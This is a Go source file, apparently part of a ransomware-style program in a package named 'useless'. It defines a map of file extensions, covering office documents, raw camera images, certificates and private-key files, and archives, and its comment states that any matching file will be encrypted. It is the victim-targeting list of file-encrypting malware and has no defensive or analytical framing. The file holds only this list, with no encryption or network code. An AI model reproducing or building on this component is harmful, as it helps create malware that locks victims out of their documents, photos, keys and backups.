package useless

// FileExtensions is a map of all allowed file extensions. Any file with an
// extension in this map will be encrypted.
var FileExtensions = map[string]bool{
	// Document formats
	".accdb": true,
	".ai":    true,
	".cdr":   true,
	".dbf":   true,
	".doc":   true,
	".docm":  true,
	".docx":  true,
	".dwg":   true,
	".dxf":   true,
	".dxg":   true,
	".eps":   true,
	".indd":  true,
	".mdb":   true,
	".mdf":   true,
	".odb":   true,
	".odc":   true,
	".odm":   true,
	".odp":   true,
	".ods":   true,
	".odt":   true,
	".pdd":   true,
	".pdf":   true,
	".ppt":   true,
	".pptm":  true,
	".pptx":  true,
	".psd":   true,
	".pst":   true,
	".rtf":   true,
	".wdb2":  true,
	".wpd":   true,
	".wps":   true,
	".xlk":   true,
	".xls":   true,
	".xlsb":  true,
	".xlsm":  true,
	".xlsx":  true,

	// Image formats
	".3fr": true,
	".arw": true,
	".cr2": true,
	".crw": true,
	".dcr": true,
	".dng": true,
	".jpg": true,
	".kdc": true,
	".mrw": true,
	".nef": true,
	".nrw": true,
	".orf": true,
	".pef": true,
	".ptx": true,
	".r3d": true,
	".raf": true,
	".raw": true,
	".rw2": true,
	".rwl": true,
	".sr2": true,
	".srf": true,
	".x3f": true,

	// Certificate formats
	".cer": true,
	".crt": true,
	".der": true,
	".p12": true,
	".p7b": true,
	".p7c": true,
	".pem": true,
	".pfx": true,

	// Archive/compression formats
	".7z":     true,
	".gzip":   true,
	".tar":    true,
	".tar.gz": true,
	".tgz":    true,
}
